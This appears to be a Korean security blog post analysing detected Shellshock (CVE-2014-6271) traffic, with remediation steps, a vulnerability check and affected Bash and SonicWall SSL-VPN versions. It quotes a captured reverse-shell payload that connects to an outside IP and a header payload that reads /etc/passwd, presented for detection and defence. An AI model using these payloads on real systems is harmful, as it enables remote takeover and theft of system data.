Shellshock(CVE-2014-6271) 와 연관된 취약점 트래픽 탐지, 분석 정보 및 관련된 취약점 정보
탐지 트래픽 정보
User Agent
() { :; }; echo ; /bin/bash -c ‘nohup bash -i >& /dev/tcp/45[.]145.185.83/9999 0>&1 &’
Username
test@liferay[.]com
분석 정보
취약점 설명
Shellshock(CVE-2014-6271)
Shellshock는 2014년에 발견된 Bash shell의 취약점이며, 공격자가 원격에서 코드를 실행할 수 있는 취약점이다.
() { :; }; echo ; /bin/bash -c 'nohup bash -i >& /dev/tcp/45.145.185.83/9999 0>&1 &'
이 명령어는 “Shellshock”라고 알려진 취약점을 이용하여 시스템에 악성 코드를 실행하는 명령어이다.
이 명령어가 취약한 시스템에서 실행되는 경우 취약점을 이용하여 원격 호스트 45.145.185.83 IP의 9999번 포트로 연결을 시도하게 된다.
이 후, 호스트에서 실행 중인 Bash 인터프리터를 사용하여 쉘을 대화형으로 열고, 입출력을 해당 연결로 리디렉션 한다.
공격자는 원격 시스템에 대한 제어를 획득하고, 악의적인 명령어를 실행하거나 시스템에 대한 악성행위를 시도할 수 있다.
명령어 실행 예시
명령어 실행
원격 호스트로 통신 시도
/dev/tcp/<ip>/<port> 명령어는 원격지의 포트 오픈 상태를 확인할 때도 사용된다.
대응 방안
취약 버전 확인 방법과 취약 버전을 참고하여 OS에 맞는 버전 업데이트 필요
버전 업데이트
예) Linux (Red Hat, CentOS)
sudo yum update
sudo yum upgrade bash
취약 버전 확인
env x='() { :;}; echo vulnerable' bash -c "echo Version Test"
위 명령어 수행 시 취약한 버전이면 ‘vulnerable’, ‘Version Test’ 가 같이 출력
vulnerable
Version Test
안전한 버전이면 ‘Version Test’ 만 출력
Version Test
취약 버전
GNU Bash 4.3을 포함하여 이전 모두 bash-3.0-27.el4.2
bash-3.2-32.el5_9.2
bash-3.2-32.el5_9.1
bash-3.2-24.el5_6.1
bash-3.2-33.el5_11.1.sjis.1
bash-3.2-33.el5.1
bash-4.1.2-15.el6_4.1
bash-4.1.2-9.el6_2.1
bash-4.1.2-15.el6_5.1.sjis.1
bash-4.1.2-15.el6_5.1
bash-4.2.45-5.el7_0.2
관련 취약점 정보(Sonicwall SSL VPN)
visualdoor-sonicwall-ssl-vpn-exploit
2021년 1월 26일 Alibaba Cloud Emergency Response Center에서 SonicWall SSL-VPN 이전 버전의 RCE(원격 명령 실행) 취약점 및 관련 익스플로잇 스크립트를 공개
SonicWall SSL-VPN은 이전 버전의 커널 및 HTTP CGI 실행 프로그램을 사용하므로 공격자는 악의적인 HTTP 요청 헤더를 구성하고 원격 임의 명령 실행을 유발하여 호스트 제어 권한을 얻음
Sonicwall SSL VPN 제품의 RCE(원격 명령 실행) 공격에 “CVE-2014-6271” 취약점을 활용함
관련 트래픽 예시
GET /cgi-bin/jarrewrite.sh HTTP/1.1 host: testweb:8080 **User Agent: () { :; }; echo; /bin/bash -c "cat /etc/passwd"**
영향을 받는 버전
- Sonic SMA 8.0.0.4미만 버전
보안 버전 및 권장
- Sonic SMA 8.0.0.4이상
- 최신 버전으로 업그레이드
'IT 보안' 카테고리의 다른 글
보안사고 침해사고 대응 절차 (0) | 2024.08.26 |
---|---|
RTLO(Right to Left Override)란 무엇인가 (0) | 2024.08.26 |
공급망 공격(Supply Chain Attack) 이란 (1) | 2024.07.03 |
신호등 규약 TLP(Traffic Light Protocol) (1) | 2024.07.03 |
MaaS(Malware as a Service) 란 무엇인가 (4) | 2024.05.18 |